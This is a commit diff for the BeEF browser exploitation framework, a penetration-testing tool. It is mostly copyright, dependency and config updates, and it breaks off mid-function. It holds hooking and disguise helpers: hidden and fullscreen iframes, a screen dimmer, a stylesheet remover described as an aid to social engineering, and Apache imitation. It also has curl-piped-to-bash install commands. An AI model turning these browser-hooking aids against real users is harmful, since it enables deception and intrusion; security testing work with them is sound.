Fix indentation

Inital version of CookieJar overflow module.  And minor bugfix of active…  closes #935

.gitignore

@@ -1,3 +1,8 @@
 beef.db
 test/msf-test
-custom-config.yaml
+custom-config.yaml
+.DS_Store
+.gitignore
+.rvmrc
+
+*.lock

BeEFLive.sh

@@ -1,110 +1,2 @@
-#!/bin/bash
-#
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'home/beef/doc/COPYING' for copying permission
-#
-
-   
-#
-# This is the auto startup script for the BeEF Live CD. 
-# IT SHOULD ONLY BE RUN ON THE LIVE CD
-# Download LiveCD here: https://github.com/beefproject/beef/downloads
-#
-# This script contains a few fixes to make BeEF play nicely with the way  
-# remastersys creates the live cd distributable as well as generating host keys 
-# to enable SSH etc. The script also make it easy for the user to update/start 
-# the BeEF server
-#
-clear
-echo "======================================"
-echo "          BeEF Live CD   "
-echo "======================================"
-echo ""
-echo "Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net"
-echo "Browser Exploitation Framework (BeEF) - http://beefproject.com"
-echo "See the file 'home/beef/doc/COPYING' for copying permission"
-echo ""
-
-echo "Welcome to the BeEF Live CD" 
-echo "" 
-echo ""
-
-#
-# Check for SSH Host Keys - if they do not exist ask user if they should be 
-# created (remastersys has a habit of deleting them during Live CD Creation)
-#
-f1="/etc/ssh/ssh_host_rsa_key"
-if [ -f $f1 ]
-then
-	echo ""
-else 
-	echo -n "Would you like to enable ssh (y/N)? "
-	read var
-	
-	if [ $var = "y" ] ; then
-		 sudo ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N ''
-		 sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N ''
-		 echo ""
-		 echo "Please provide a password for ssh user: beef"
-		 sudo passwd beef
-		 echo "ssh enabled"
-	fi
-fi
-echo ""
-
-#
-# Prompt the user if they would like to update BeEF and 
-# other components installed (such as sqlmap and msf)
-#
-echo -n "Check and install updates for BeEF (y/N)? "
-read var
-
-if [ $var = "y" ] ; then
-	 cd /opt/beef
-	 git stash
-	 git pull
-fi
-echo ""
-
-echo -n "Check and install updates for msf and sqlmap (y/N)? "
-read var
-
-if [ $var = "y" ] ; then
- 	 cd /opt/sqlmap
- 	 git stash
-	 git pull
-	 cd /opt/metasploit-framework
-	 git stash
-	 git pull
-fi
- 
- 
-#
-# Create a shortcut in the user's home folder to BeEF, msf and sqlmap
-# (if they do not yet exist)
-#
-f1="beef"
-if [ -f $f1 ] ; then
-	echo ""
-else
-	ln -s /opt/beef/ beef
-	ln -s /opt/metasploit-framework/ msf
-	ln -s /opt/sqlmap/ sqlmap
-fi
-
-#
-# Prompt the user if they would like start BeEF
-#
-echo -n "Start BeEF (y/N)? "
-read var
-
-if [ $var = "y" ] ; then
-	echo ""
-	echo "Starting BeEF..";
-	
-	cd /opt/beef
-	ruby beef -x
-fi
-
-
+# Reference for old (<1.2) versions of BeEF Live
+bash /opt/beef/liveCD/BeEFLive.sh

Gemfile

@@ -1,23 +1,26 @@
 # BeEF's Gemfile
 
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 
-# Gems only required on Windows, or with specific Windows issues
-if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
-  gem "win32console"
-  gem "eventmachine", "1.0.0.beta.4.1"
-else
-  gem "eventmachine", "0.12.10"
-end
-
+gem "eventmachine", "1.0.3"
 gem "thin"
-gem "sinatra", "1.3.2"
+gem "sinatra", "1.4.2"
+gem "rack", "1.5.2"
 gem "em-websocket", "~> 0.3.6"
-gem "jsmin", "~> 1.0.1"
+gem "uglifier", "~> 2.2.1"
+if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
+  # make sure you install this gem following https://github.com/hiranpeiris/therubyracer_for_windows
+  gem "therubyracer", "~> 0.11.0beta1"
+  gem "execjs"
+  gem "win32console"
+elsif !RUBY_PLATFORM.downcase.include?("darwin")
+  gem "therubyracer"
+  gem "execjs"
+end
 gem "ansi"
 gem "term-ansicolor", :require => "term/ansicolor"
 gem "dm-core"
@@ -28,6 +31,7 @@ gem "parseconfig"
 gem "erubis"
 gem "dm-migrations"
 gem "msfrpc-client"
+gem "rubyzip", "~> 1.0.0"
 
 # notifications
 gem "twitter"

INSTALL.txt

@@ -1,6 +1,6 @@
 ===============================================================================
    
-    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 
@@ -26,11 +26,14 @@ Installation
 
       
    2. Prerequisites (Windows)
+
+      !!! This must be done PRIOR to running the bundle install command !!!
       
       Windows requires the sqlite.dll.  Simply grab the zip file below and extract it to your Ruby bin directory:
 
 	  http://www.sqlite.org/sqlitedll-3_7_0_1.zip
-      
+
+	  Other than that, you also need TheRubyRacer. As it's painful to install it on Windows, you can download 2 pre-compiled V8 DLLs and 2 gems from https://github.com/hiranpeiris/therubyracer_for_windows.
 
    3. Prerequisites (Linux)
 
@@ -40,8 +43,8 @@ Installation
 
       3.0. sudo apt-get install libsqlite3-dev sqlite3 sqlite3-doc
       3.1. install rvm from rvm.beginrescueend.com, this takes care of the various incompatable and conflicting ruby packages that are required
-      3.2. rvm install 1.9.2
-      3.3. rvm use 1.9.2
+      3.2. rvm install 1.9.3-p484
+      3.3. rvm use 1.9.3
 	  
    4. Prerequisites (Mac OSX)
    
@@ -50,15 +53,15 @@ Installation
       - Ruby 1.9
       	To install RVM and Ruby 1.9.3 on Mac OS:  
       	$ bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile 
-      	$ rvm install 1.9.3-p0 --with-gcc=clang
+      	$ rvm install 1.9.3-p484
 		$ rvm use 1.9.3
       
 
    5. Install instructions
    
-      Obtain application code either by downloading an archive from https://github.com/beefproject/beef/zipball/master or cloning the GIT repo git@github.com:beefproject/beef.git
+      Obtain application code either by downloading an archive from https://github.com/beefproject/beef/archive/master.zip or cloning the GIT repo https://github.com/beefproject/beef.git
 
-	  Navigate to the ruby source directory and run:
+	  Enter into the newly created BeEF directory, and type:
 
 	  bundle install
 
@@ -68,4 +71,4 @@ Installation
 
       Simply run:
 
-      ./beef
+      ./beef -x

README

@@ -1,6 +1,6 @@
 ===============================================================================
    
-    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 
@@ -35,24 +35,9 @@ Requirements
 ------------
 
 * OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
-* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
+* [Ruby](http://rubylang.org) 1.9.2 or higher
 * [SQLite](http://sqlite.org) 3.x
-* The following GEMS: 
-   - bundler 
-   - thin
-   - Sinatra 
-   - ANSI 
-   - TERM-ANSIcolor 
-   - dm-core 
-   - json 
-   - data_objects 
-   - dm-sqlite-adapter 
-   - parseconfig 
-   - erubis 
-   - dm-migrations 
-   - msfrpc-client 
-   - eventmachine
-   - win32console (Windows Only)
+* The gems listed in the Gemfile: https://github.com/beefproject/beef/blob/master/Gemfile
 
 
 Quick Start
@@ -60,7 +45,8 @@ Quick Start
 
 __The following is for the impatient.__ 
 
-For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. 
+For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
+We also have a Wiki page at https://github.com/beefproject/beef/wiki/Installation
 
    $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
 

README.mkd

@@ -1,6 +1,6 @@
 ===============================================================================
    
-    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 
@@ -35,24 +35,9 @@ Requirements
 ------------
 
 * OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
-* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
+* [Ruby](http://rubylang.org) 1.9.2 or higher
 * [SQLite](http://sqlite.org) 3.x
-* The following GEMS: 
-   - bundler 
-   - thin
-   - Sinatra 
-   - ANSI 
-   - TERM-ANSIcolor 
-   - dm-core 
-   - json 
-   - data_objects 
-   - dm-sqlite-adapter 
-   - parseconfig 
-   - erubis 
-   - dm-migrations 
-   - msfrpc-client 
-   - eventmachine
-   - win32console (Windows Only)
+* The gems listed in the Gemfile: https://github.com/beefproject/beef/blob/master/Gemfile
 
 
 Quick Start
@@ -60,7 +45,8 @@ Quick Start
 
 __The following is for the impatient.__ 
 
-For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. 
+For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
+We also have a Wiki page at https://github.com/beefproject/beef/wiki/Installation
 
        $ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
 
@@ -72,3 +58,6 @@ To get started, simply execute beef and follow the instructions:
 
        $ ./beef
 
+On windows use
+
+      $ ruby beef

Rakefile

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -76,10 +76,10 @@ end
 @beef_process_id = nil;
 
 task :beef_start => 'beef' do
-  printf "Starting BeEF (wait 10 seconds)..."
+  printf "Starting BeEF (wait a few seconds)..."
   @beef_process_id = IO.popen("ruby ./beef -x 2> /dev/null", "w+")
-  delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
-  delays.each do |i| # delay for 10 seconds
+  delays = [3, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
+  delays.each do |i| # delay for a few seconds
     printf '.'
     sleep (i)
   end

VERSION

@@ -1,7 +1,7 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.3.9-alpha
+0.4.4.9-alpha

beef

@@ -1,7 +1,7 @@
 #!/usr/bin/env ruby
 
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -75,6 +75,7 @@ case config.get("beef.database.driver")
     DataMapper.setup(:default,
                      :adapter => config.get("beef.database.driver"),
                      :host => config.get("beef.database.db_host"),
+                     :port => config.get("beef.database.db_port"),
                      :username => config.get("beef.database.db_user"),
                      :password => config.get("beef.database.db_passwd"),
                      :database => config.get("beef.database.db_name"),

config.yaml

@@ -1,13 +1,16 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 # BeEF Configuration file
 
 beef:
-    version: '0.4.3.9-alpha'
+    version: '0.4.4.9-alpha'
+    # More verbose messages (server-side)
     debug: false
+    # More verbose messages (client-side)
+    client_debug: false
 
     restrictions:
         # subnet of browser ip addresses that can hook to the framework
@@ -27,30 +30,38 @@ beef:
         # if running behind a nat set the public ip address here
         #public: ""
         #public_port: "" # port setting is experimental
-        dns: "localhost"
-        panel_path: "/ui/panel"
+        # DNS
+        dns_host: "localhost"
+        dns_port: 53
+        web_ui_basepath: "/ui"
         hook_file: "/hook.js"
         hook_session_name: "BEEFHOOK"
         session_cookie_name: "BEEFSESSION"
 
+        # Allow one or multiple domains to access the RESTful API using CORS
+        # For multiple domains use: "http://browserhacker.com, http://domain2.com"
+        restful_api:
+            allow_cors: false
+            cors_allowed_domains: "http://browserhacker.com"
+
         # Prefer WebSockets over XHR-polling when possible.
         websocket:
           enable: false
-          secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
+          secure: true # use 'WebSocketSecure' works only on HTTPS domains and with HTTPS support enabled in BeEF
           port: 61985 # WS: good success rate through proxies
           secure_port: 61986 # WSSecure
           ws_poll_timeout: 1000 # poll BeEF every second
 
         # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
         web_server_imitation:
-            enable: false
+            enable: true
             type: "apache" #supported: apache, iis
 
         # Experimental HTTPS support for the hook / admin / all other Thin managed web services
         https:
             enable: false
             # In production environments, be sure to use a valid certificate signed for the value
-            # used in beef.http.dns (the domain name of the server where you run BeEF)
+            # used in beef.http.dns_host (the domain name of the server where you run BeEF)
             key: "beef_key.pem"
             cert: "beef_cert.pem"
 
@@ -72,6 +83,7 @@ beef:
 
         # db connection information is only used for mysql/postgres
         db_host: "localhost"
+        db_port: 5432
         db_name: "beef"
         db_user: "beef"
         db_passwd: "beef123"

core/api.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -155,7 +155,7 @@ module BeEF
                 if not result == nil
                   data << {:api_id => mod[:id], :data => result}
                 end
-              rescue Exception => e
+              rescue => e
                 print_error "API Fire Error: #{e.message} in #{mod.to_s}.#{method.to_s}()"
               end
             end

core/api/extension.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/extensions.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/configuration.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/migration.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/network_stack/assethandler.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/server.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/server/hook.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/module.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/modules.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/bootstrap.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -24,6 +24,8 @@ require 'core/main/handlers/browserdetails'
 
 # @note Include the network stack
 require 'core/main/network_stack/handlers/dynamicreconstruction'
+require 'core/main/network_stack/handlers/redirector'
+require 'core/main/network_stack/handlers/raw'
 require 'core/main/network_stack/assethandler'
 require 'core/main/network_stack/api'
 
@@ -43,6 +45,7 @@ require 'core/main/rest/handlers/modules'
 require 'core/main/rest/handlers/categories'
 require 'core/main/rest/handlers/logs'
 require 'core/main/rest/handlers/admin'
+require 'core/main/rest/handlers/server'
 require 'core/main/rest/api'
 
 ## @note Include Websocket

core/core.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -37,4 +37,7 @@ require 'core/main/migration'
 require 'core/main/console/commandline'
 require 'core/main/console/banners'
 
+# @note Include rubyzip lib
+require 'zip'
+
 

core/extension.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/extensions.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/filters.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/filters/base.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/filters/browser.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -22,7 +22,7 @@ module Filters
   def self.is_valid_browsertype?(str)
     return false if not is_non_empty_string?(str)
     return false if str.length < 10
-    return false if str.length > 50
+    return false if str.length > 250
     return false if has_non_printable_char?(str)
     true
   end
@@ -123,9 +123,9 @@ module Filters
     return true if not is_non_empty_string?(str)
     return false if str.length > 1000
     if RUBY_VERSION >= "1.9" && str.encoding === Encoding.find('UTF-8')
-      return (str =~ /[^\w\d\s()-.,;_!\302\256]/u).nil?
+      return (str =~ /[^\w\d\s()-.,';_!\302\256]/u).nil?
     else
-      return (str =~ /[^\w\d\s()-.,;_!\302\256]/n).nil?
+      return (str =~ /[^\w\d\s()-.,';_!\302\256]/n).nil?
     end
   end
 

core/filters/command.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/filters/http.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/filters/page.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/hbmanager.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/loader.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/client/are.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -9,8 +9,39 @@ beef.are = {
    var Jools = require('jools');
    this.ruleEngine = new Jools();
   },
-  rules:[],
+  send:function(module){
+    // there will probably be some other stuff here before things are finished
+    this.commands.push(module);
+  },
+  execute:function(inputs){
+    this.rulesEngine.execute(input);
+  },
+  cache_modules:function(modules){},
+  rules:[
+    {
+      'name':"exec_no_input",
+      'condition':function(command,browser){
+          //need to figure out how to handle the inputs
+          return (!command['inputs'] || command['inputs'].length == 0)
+       },
+      'consequence':function(command,browser){}
+    },
+    {
+      'name':"module_has_sibling",
+      'condition':function(command,commands){
+        return false;
+      },
+      'consequence':function(command,commands){}
+    },
+    {
+      'name':"module_depends_on_module",
+      'condition':function(command,commands){
+        return false;
+      },
+      'consequence':function(command,commands){}
+    }
+  ],
   commands:[],
   results:[]
 };
-beef.regCmp("beef.are");
+beef.regCmp("beef.are");

core/main/client/beef.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -31,7 +31,21 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
 		
 		// An array containing all the BeEF JS components.
 		components: new Array(),
-		
+
+                /**
+                 * Adds a function to display debug messages (wraps console.log())
+                 * @param: {string} the debug string to return
+                 */
+                debug: function(msg) {
+                    if (!<%= @client_debug %>) return;
+                    if (typeof console == "object" && typeof console.log == "function") {
+                        console.log(msg);
+                    } else {
+                        // TODO: maybe add a callback to BeEF server for debugging purposes
+                        //window.alert(msg);
+                    }
+                },
+
 		/**
 		 * Adds a function to execute.
 		 * @param: {Function} the function to execute.

core/main/client/browser/cookie.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/browser/popup.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/dom.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -76,6 +76,30 @@ beef.dom = {
 		
 		return iframe;
 	},
+
+	/**
+	 * Returns the highest current z-index
+	 * @param: {Boolean} whether to return an associative array with the height AND the ID of the element
+	 * @return: {Integer} Highest z-index in the DOM
+	 * OR
+	 * @return: {Hash} A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING}
+	 */
+	getHighestZindex: function(include_id) {
+		var highest = {'height':0, 'elem':''};
+		$j('*').each(function() {
+			var current_high = parseInt($j(this).css("zIndex"),10);
+			if (current_high > highest.height) {
+				highest.height = current_high;
+				highest.elem = $j(this).attr('id');
+			}
+		});
+
+		if (include_id) {
+			return highest;
+		} else {
+			return highest.height;
+		}
+	},
 	
 	/**
      * Create and iFrame element. In case it's create with POST method, the iFrame is automatically added to the DOM and submitted.
@@ -95,8 +119,15 @@ beef.dom = {
 			var form_action = params['src'];
 			params['src'] = '';
 		}
-		if (type == 'hidden') { css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles); }
-		if (type == 'fullscreen') { css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px'}, styles); $j('body').css({'padding':'0px', 'margin':'0px'}); }
+		if (type == 'hidden') {
+			css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles);
+		} else if (type == 'fullscreen') {
+			css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px', 'z-index':beef.dom.getHighestZindex()+1}, styles);
+			$j('body').css({'padding':'0px', 'margin':'0px'});
+		} else {
+			css = styles;
+			$j('body').css({'padding':'0px', 'margin':'0px'});
+		}
 		var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body');
 		
 		if (form_submit && form_action)
@@ -127,6 +158,75 @@ beef.dom = {
             }
         });
     },
+
+    /**
+     * Load a full screen div that is black, or, transparent
+     * @param: {Boolean} vis: whether or not you want the screen dimmer enabled or not
+     * @param: {Hash} options: a collection of options to customise how the div is configured, as follows:
+     *         opacity:0-100         // Lower number = less grayout higher = more of a blackout
+     *           // By default this is 70 
+     *         zindex: #             // HTML elements with a higher zindex appear on top of the gray out
+     *           // By default this will use beef.dom.getHighestZindex to always go to the top
+     *         bgcolor: (#xxxxxx)    // Standard RGB Hex color code
+     *           // By default this is #000000
+     */
+	grayOut: function(vis, options) {
+	  // in any order.  Pass only the properties you need to set.
+	  var options = options || {};
+	  var zindex = options.zindex || beef.dom.getHighestZindex()+1;
+	  var opacity = options.opacity || 70;
+	  var opaque = (opacity / 100);
+	  var bgcolor = options.bgcolor || '#000000';
+	  var dark=document.getElementById('darkenScreenObject');
+	  if (!dark) {
+	    // The dark layer doesn't exist, it's never been created.  So we'll
+	    // create it here and apply some basic styles.
+	    // If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
+	    var tbody = document.getElementsByTagName("body")[0];
+	    var tnode = document.createElement('div');           // Create the layer.
+	        tnode.style.position='absolute';                 // Position absolutely
+	        tnode.style.top='0px';                           // In the top
+	        tnode.style.left='0px';                          // Left corner of the page
+	        tnode.style.overflow='hidden';                   // Try to avoid making scroll bars            
+	        tnode.style.display='none';                      // Start out Hidden
+	        tnode.id='darkenScreenObject';                   // Name it so we can find it later
+	    tbody.appendChild(tnode);                            // Add it to the web page
+	    dark=document.getElementById('darkenScreenObject');  // Get the object.
+	  }
+	  if (vis) {
+	    // Calculate the page width and height 
+	    if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
+	        var pageWidth = document.body.scrollWidth+'px';
+	        var pageHeight = document.body.scrollHeight+'px';
+	    } else if( document.body.offsetWidth ) {
+	      var pageWidth = document.body.offsetWidth+'px';
+	      var pageHeight = document.body.offsetHeight+'px';
+	    } else {
+	       var pageWidth='100%';
+	       var pageHeight='100%';
+	    }
+	    //set the shader to cover the entire page and make it visible.
+	    dark.style.opacity=opaque;
+	    dark.style.MozOpacity=opaque;
+	    dark.style.filter='alpha(opacity='+opacity+')';
+	    dark.style.zIndex=zindex;
+	    dark.style.backgroundColor=bgcolor;
+	    dark.style.width= pageWidth;
+	    dark.style.height= pageHeight;
+	    dark.style.display='block';
+	  } else {
+	     dark.style.display='none';
+	  }
+	},
+
+	/**
+	 * Remove all external and internal stylesheets from the current page - sometimes prior to socially engineering,
+	 *  or, re-writing a document this is useful.
+	 */
+	removeStylesheets: function() {
+		$j('link[rel=stylesheet]').remove();
+		$j('style').remove();
+	},
 	
 	/**
      * Create a form element with the specified parameters, appending it to the DOM if append == true
@@ -178,6 +278,23 @@ beef.dom = {
 		}).length;
 	},
 
+	/**
